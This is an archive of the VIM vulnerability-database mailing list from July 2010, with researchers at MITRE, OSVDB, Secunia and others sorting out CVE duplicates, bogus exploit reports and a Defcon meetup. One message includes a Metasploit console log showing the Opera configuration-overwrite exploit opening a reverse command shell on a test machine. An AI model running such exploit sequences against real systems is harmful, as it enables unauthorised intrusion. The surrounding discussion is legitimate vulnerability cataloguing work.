From jericho at attrition.org Mon Jul 5 14:04:07 2010 From: jericho at attrition.org (security curmudgeon) Date: Mon, 5 Jul 2010 14:04:07 -0500 (CDT) Subject: [VIM] ZDI-10-115: Adobe Flash Player AVM newFrameState Integer Overfow Remote Code Execution Vulnerability In-Reply-To: References: Message-ID: Hi ZDI, On Fri, 25 Jun 2010, ZDI Disclosures wrote: : ZDI-10-115: Adobe Flash Player AVM newFrameState Integer Overfow Remote Code Execution Vulnerability : http://www.zerodayinitiative.com/advisories/ZDI-10-115 : -- CVE ID: : CVE-2010-2160 ZDI-10-114 shares this CVE, and the CVE entry only references the getouterscope method: http://cve.mitre.org/cgi-bin/cvename.cgi?name=2010-2160 Can you confirm the newFrameState issue (ZDI-10-115) shares the same CVE? Thanks, Brian OSVDB.org From coley at linus.mitre.org Tue Jul 6 11:38:35 2010 From: coley at linus.mitre.org (Steven M. Christey) Date: Tue, 6 Jul 2010 12:38:35 -0400 (EDT) Subject: [VIM] tomatoCMS - dupe or not? Message-ID: alleged rediscovery by HTBridge here: http://www.securityfocus.com/archive/1/512068/100/0/threaded claim is "q" parameter in index.php, in 2.0.6. Jericho claims dupe with original Secunia discovery here: http://www.securityfocus.com/archive/1/archive/1/512189/100/0/threaded but that issue, CVE-2010-1994, is the PATH_INFO in index.php, claimed to be fixed in 2.0.5. I suspect these are distinct vectors and vulns - Secunia? - Steve From zdi-disclosures at tippingpoint.com Tue Jul 6 15:54:41 2010 From: zdi-disclosures at tippingpoint.com (ZDI Disclosures) Date: Tue, 6 Jul 2010 15:54:41 -0500 Subject: [VIM] ZDI-10-115: Adobe Flash Player AVM newFrameState Integer Overfow Remote Code Execution Vulnerability In-Reply-To: References: Message-ID: Hi Brian, I can confirm and it does share the CVE ID, as provided to us by the vendor. Best, Kate -----Original Message----- From: security curmudgeon [mailto:jericho at attrition.org] Sent: Monday, July 05, 2010 2:04 PM To: ZDI Disclosures Cc: vim at attrition.org Subject: Re: ZDI-10-115: Adobe Flash Player AVM newFrameState Integer Overfow Remote Code Execution Vulnerability Hi ZDI, On Fri, 25 Jun 2010, ZDI Disclosures wrote: : ZDI-10-115: Adobe Flash Player AVM newFrameState Integer Overfow Remote Code Execution Vulnerability : http://www.zerodayinitiative.com/advisories/ZDI-10-115 : -- CVE ID: : CVE-2010-2160 ZDI-10-114 shares this CVE, and the CVE entry only references the getouterscope method: http://cve.mitre.org/cgi-bin/cvename.cgi?name=2010-2160 Can you confirm the newFrameState issue (ZDI-10-115) shares the same CVE? Thanks, Brian OSVDB.org From theall at tenablesecurity.com Tue Jul 6 20:31:34 2010 From: theall at tenablesecurity.com (George A. Theall) Date: Tue, 6 Jul 2010 21:31:34 -0400 Subject: [VIM] PsNews v1.3 SQL Injection Vulnerability Message-ID: Exploit DB 14251 / Bugtraq 41410 concerns SQL injection vulnerabilities in something called PsNews. Both list the 'ndetail.php' and 'print.php' scripts as affected and point to a SourceForge project page. Yet if you go to that project page, you see it's an ASP app (eg, "ASP based Content Management System"). And if you download version 1.3, which is supposed to be affected, you see neither script is included. Not even if you ignore the discrepancy in the file type. So, is it a different app that's affected? Or just a bogus report? George -- theall at tenablesecurity.com From che at secunia.com Wed Jul 7 10:27:12 2010 From: che at secunia.com (Carsten H. Eiram) Date: Wed, 07 Jul 2010 17:27:12 +0200 Subject: [VIM] tomatoCMS - dupe or not? In-Reply-To: References: Message-ID: <1278516432.18695.930.camel@TS-HQ-4> I had one of my guys look into this and retest versions 2.0.5 and 2.0.6. The conclusion is that: a) This is a dupe of http://secunia.com/secunia_research/2010-56 as spotted by Jericho. b) The report from HTBridge stating that versions 2.0.6 and prior are affected is incorrect. Version 2.0.5 does fix the vulnerability and it has not been reintroduced in version 2.0.6. Perhaps HTBridge tested against the vendor demo site, which runs the vulnerable version 2.0.4, thinking it was the latest version? /Carsten On Tue, 2010-07-06 at 12:38 -0400, Steven M. Christey wrote: > alleged rediscovery by HTBridge here: > > http://www.securityfocus.com/archive/1/512068/100/0/threaded > > claim is "q" parameter in index.php, in 2.0.6. > > Jericho claims dupe with original Secunia discovery here: > > http://www.securityfocus.com/archive/1/archive/1/512189/100/0/threaded > > but that issue, CVE-2010-1994, is the PATH_INFO in index.php, claimed to > be fixed in 2.0.5. > > I suspect these are distinct vectors and vulns - Secunia? > > - Steve > -- Med venlig hilsen / Kind regards Carsten H. Eiram Chief Security Specialist Secunia Weidekampsgade 14 A DK-2300 Copenhagen S Denmark Phone +45 7020 5144 Fax +45 7020 5145 From jericho at attrition.org Thu Jul 8 18:32:12 2010 From: jericho at attrition.org (security curmudgeon) Date: Thu, 8 Jul 2010 18:32:12 -0500 (CDT) Subject: [VIM] old PHP issues Message-ID: Digging through old links to sort, found this again: http://www.cr0w.ru/2009/03/self-contained-file-include-in-php-520.html Would these be implementation specific, or flaws in PHP itself? From ascii at katamail.com Fri Jul 9 01:36:35 2010 From: ascii at katamail.com (ascii) Date: Fri, 09 Jul 2010 08:36:35 +0200 Subject: [VIM] old PHP issues In-Reply-To: References: Message-ID: <4C36C373.1030006@katamail.com> On 07/09/2010 01:32 AM, security curmudgeon wrote: > Digging through old links to sort, found this again: > http://www.cr0w.ru/2009/03/self-contained-file-include-in-php-520.html > Would these be implementation specific, or flaws in PHP itself? It's a feature of PHP, known and exploited from many years, well before 2009. PHP file functions support different URI handlers, that's why RFI over HTTP was so common in the first place (forgetting about absolutely ugly and vulnerable PHP code written by first time developers). Have a nice day, Francesco `ascii` Ongaro http://www.ush.it/ From jericho at attrition.org Fri Jul 9 02:00:20 2010 From: jericho at attrition.org (security curmudgeon) Date: Fri, 9 Jul 2010 02:00:20 -0500 (CDT) Subject: [VIM] old PHP issues In-Reply-To: <4C36C373.1030006@katamail.com> References: <4C36C373.1030006@katamail.com> Message-ID: On Fri, 9 Jul 2010, ascii wrote: : On 07/09/2010 01:32 AM, security curmudgeon wrote: : > Digging through old links to sort, found this again: : > http://www.cr0w.ru/2009/03/self-contained-file-include-in-php-520.html : > Would these be implementation specific, or flaws in PHP itself? : : It's a feature of PHP, known and exploited from many years, well before : 2009. "feature" of PHP, "exploited from many years" =) Wording implies it is known functionality of PHP, but may be considered an exploit by others. PHP also has a history of downplaying or ignoring vulnerabilities, making this product specifically questionable as to the difference. Any clarification? Thanks, Brian From theall at tenablesecurity.com Tue Jul 13 10:16:21 2010 From: theall at tenablesecurity.com (George A. Theall) Date: Tue, 13 Jul 2010 11:16:21 -0400 Subject: [VIM] SunSolve Links Broken? Message-ID: <3F07B625-0AB3-4EC2-9A92-3B9C52F038C2@tenablesecurity.com> Maybe this is old news for you VDB folks, but I just noticed that links to Sun Alerts of the form http://sunsolve.sun.com/search/document.do?assetkey=1-2X-XXXXXX return a 404 error page. That page also notes that documents of the form 1-6X-XXXXXX will no longer be accessible after December 2010. George -- theall at tenablesecurity.com From coley at linus.mitre.org Tue Jul 13 11:41:40 2010 From: coley at linus.mitre.org (Steven M. Christey) Date: Tue, 13 Jul 2010 12:41:40 -0400 (EDT) Subject: [VIM] SunSolve Links Broken? In-Reply-To: <3F07B625-0AB3-4EC2-9A92-3B9C52F038C2@tenablesecurity.com> References: <3F07B625-0AB3-4EC2-9A92-3B9C52F038C2@tenablesecurity.com> Message-ID: I've had various difficulties that I've informed Oracle about but didn't notice the broken assetkey=1-26-XXXXXX-1 problems. I'll pass this on to them as well. - Steve From dm at securityfocus.com Fri Jul 23 11:44:23 2010 From: dm at securityfocus.com (dm at securityfocus.com) Date: Fri, 23 Jul 2010 10:44:23 -0600 Subject: [VIM] opera_configoverwrite.rb Message-ID: <20100723164423.GA20600@securityfocus.com> Hey, Does anybody (CVE, OSVDB, etc.) have a record for this vulnerability? https://www.metasploit.com/redmine/projects/framework/repository/revisions/7724/entry/modules/exploits/multi/browser/opera_configoverwrite.rb I can't find one in our VDB -- at least nothing specific enough to pin it to this exploit. It's been exploited in the wild by a few exploit packs, namely CRiMEPACK. I talked to someone at Opera and they haven't been able to reproduce it in 9.x versions (which it is supposed to affect). They're not sure exactly when it was fixed. -- Dave McKinney Symantec keyID: E461AE4E key fingerprint = F1FC 9073 09FA F0C7 500D D7EB E985 FAF3 E461 AE4E From steve at vitriol.net Fri Jul 23 12:33:25 2010 From: steve at vitriol.net (Steve Tornio) Date: Fri, 23 Jul 2010 12:33:25 -0500 Subject: [VIM] opera_configoverwrite.rb In-Reply-To: <20100723164423.GA20600@securityfocus.com> References: <20100723164423.GA20600@securityfocus.com> Message-ID: On Fri, Jul 23, 2010 at 11:44 AM, wrote: > Does anybody (CVE, OSVDB, etc.) have a record for this vulnerability? > egyp7 asked me about this yesterday, because he was trying to track down refs for it. All I could find was the metasploit module and the corresponding exploit-db (9945). I created OSVDB 66472 to start collecting information on it, but hadn't found any more than what's in the metasploit module (current version - https://www.metasploit.com/redmine/projects/framework/repository/revisions/9906/entry/modules/exploits/multi/browser/opera_configoverwrite.rb ) > > I can't find one in our VDB -- at least nothing specific enough to pin > it to this exploit. > > It's been exploited in the wild by a few exploit packs, namely > CRiMEPACK. > > I talked to someone at Opera and they haven't been able to reproduce > it in 9.x versions (which it is supposed to affect). They're not sure > exactly when it was fixed. He couldn't remember if the issue was fixed in 9.10, or included 9.10, and has since deleted the VM he was testing with. Since he wrote the module as <= 9.10, I went with 9.10 as the last vulnerable version. He does remember that the issue was fixed in a later release, whether it's 9.10 or 9.20. He did get the exploit from mpack. Thanks, Steve From jkouns at opensecurityfoundation.org Mon Jul 26 00:17:39 2010 From: jkouns at opensecurityfoundation.org (Jake Kouns) Date: Mon, 26 Jul 2010 01:17:39 -0400 Subject: [VIM] Annual VIM Gathering at Defcon Message-ID: Another year............ and the same question.... Should we have another gathering and if so where? If anyone is up for it let me know. At this point I am thinking a Friday lunch meeting @ Peppermill. --Jake From amanion at cert.org Mon Jul 26 14:38:31 2010 From: amanion at cert.org (Art Manion) Date: Mon, 26 Jul 2010 15:38:31 -0400 Subject: [VIM] Annual VIM Gathering at Defcon In-Reply-To: References: Message-ID: <4C4DE437.50109@cert.org> On 2010-07-26 01:17, Jake Kouns wrote: > Another year............ and the same question.... Should we have > another gathering and if so where? > If anyone is up for it let me know. At this point I am thinking a > Friday lunch meeting @ Peppermill. I'm up for it, kinda sentimental about shadow lounge some evening, but almost any time/date works for us. - Art From theall at tenable.com Mon Jul 26 21:04:02 2010 From: theall at tenable.com (George A. Theall) Date: Mon, 26 Jul 2010 22:04:02 -0400 Subject: [VIM] 4images v1.7.7 Remote Command Execution Vulnerability Message-ID: <02B2A41B-F460-441D-ADB9-83377F364030@tenable.com> Exploit DB #14478 looks bogus -- here's a slightly larger snippet of the affected file from version 1.7.7: ----- snip, snip, snip ----- References: <02B2A41B-F460-441D-ADB9-83377F364030@tenable.com> Message-ID: <57FE962A-B0E1-4893-A381-2B82264D2D96@tenable.com> On Jul 26, 2010, at 10:04 PM, George A. Theall wrote: > Exploit DB #14478 looks bogus -- here's a slightly larger snippet of > the affected file from version 1.7.7: And it looks like Bugtraq ID 41974 was recently created to cover this "issue". George -- theall at tenablesecurity.com From steve at vitriol.net Tue Jul 27 07:30:02 2010 From: steve at vitriol.net (Steve Tornio) Date: Tue, 27 Jul 2010 07:30:02 -0500 Subject: [VIM] opera_configoverwrite.rb In-Reply-To: <20100723164423.GA20600@securityfocus.com> References: <20100723164423.GA20600@securityfocus.com> Message-ID: On Fri, Jul 23, 2010 at 11:44 AM, wrote: > I talked to someone at Opera and they haven't been able to reproduce > it in 9.x versions (which it is supposed to affect). They're not sure > exactly when it was fixed. > egypt set up an environment to verify this. It is exploitable on Fedora Core 5, Opera 9.10. http://www.pastebin.ca/1909252 msf exploit(opera_configoverwrite) > set ENCODER cmd/generic_sh ENCODER => cmd/generic_sh msf exploit(opera_configoverwrite) > rexploit [*] Stopping existing job... [*] Server stopped. [*] Exploit running as background job. [*] Started reverse handler on 192.168.99.1:4444 [*] Using URL: http://0.0.0.0:8080/ [*] Local IP: http://192.168.2.100:8080/ [*] Server started. msf exploit(opera_configoverwrite) > [*] Got request / [*] Sending Opera 9 Configuration Overwrite to 192.168.99.134:56071... [*] Done with request / [*] Got request /favicon.ico [*] 404ing request for /favicon.ico [*] Command shell session 1 opened (192.168.99.1:4444 -> 192.168.99.134:59644) at 2010-07-27 06:21:11 -0600 msf exploit(opera_configoverwrite) > sessions -i 1 [*] Starting interaction with 1... id uid=500(vulnerable) gid=500(vulnerable) groups=500(vulnerable) context=user_u:system_r:unconfined_t ps PID TTY TIME CMD 3097 pts/1 00:00:00 bash 10378 pts/1 00:00:10 opera 10387 pts/1 00:00:00 operapluginwrap 10449 pts/1 00:00:00 sh 10451 pts/1 00:00:00 sh 10452 pts/1 00:00:00 sh 10458 pts/1 00:00:00 ps From coley at linus.mitre.org Tue Jul 27 14:00:34 2010 From: coley at linus.mitre.org (Steven M. Christey) Date: Tue, 27 Jul 2010 15:00:34 -0400 (EDT) Subject: [VIM] Annual VIM Gathering at Defcon In-Reply-To: References: Message-ID: On Mon, 26 Jul 2010, Jake Kouns wrote: > Another year............ and the same question.... Should we have > another gathering and if so where? > If anyone is up for it let me know. At this point I am thinking a > Friday lunch meeting @ Peppermill. Probably works for me. Art, not sure if you have my cell #, I'll email you separately. Certain unnamed Danes have decided that they don't like us anymore, so we'll have to have Jaeger-bombs without them. - Steve From coley at linus.mitre.org Tue Jul 27 15:45:12 2010 From: coley at linus.mitre.org (Steven M. Christey) Date: Tue, 27 Jul 2010 16:45:12 -0400 (EDT) Subject: [VIM] CVE number confusion in HP OV NNM products Message-ID: All, Due to an accidental switch of CVEs by VUPEN in their two advisories on OV NNM, there's a little bit of confusion about CVE numbers. I've clarified things with both VUPEN and HP. CVE-2010-2703 is for the ov.dll vector, found by both ZDI and VUPEN, listed in HPSBMA02557 and SSRT100025. VUPEN's ov.dll advisory inadvertently used the wrong CVE. CVE-2010-2704 is for the VUPEN-discovered nnmrptconfig.exe vector, covered in HPSBMA02558 / SSRT100158 (also SSRT010158, presumably a typo in the HP advisory ID). - Steve From che at secunia.com Wed Jul 28 07:15:10 2010 From: che at secunia.com (Carsten H. Eiram) Date: Wed, 28 Jul 2010 14:15:10 +0200 Subject: [VIM] Annual VIM Gathering at Defcon In-Reply-To: References: Message-ID: <1280319310.8093.426.camel@TS-HQ-2> On Tue, 2010-07-27 at 15:00 -0400, Steven M. Christey wrote: > On Mon, 26 Jul 2010, Jake Kouns wrote: > > > Another year............ and the same question.... Should we have > > another gathering and if so where? > > If anyone is up for it let me know. At this point I am thinking a > > Friday lunch meeting @ Peppermill. > > Probably works for me. > > Art, not sure if you have my cell #, I'll email you separately. > > Certain unnamed Danes have decided that they don't like us anymore, so > we'll have to have Jaeger-bombs without them. If those unnamed Danes still don't like you next year (though I'm sure they will as you're all lovable chaps), then let me know and I'll come by and keep you and the J?gerbombs company. However, you should probably stay away from them this year - shooting J?gerbombs without Danish supervision is not safe. /Carsten -- Med venlig hilsen / Kind regards Carsten H. Eiram Chief Security Specialist Secunia Weidekampsgade 14 A DK-2300 Copenhagen S Denmark Phone +45 7020 5144 Fax +45 7020 5145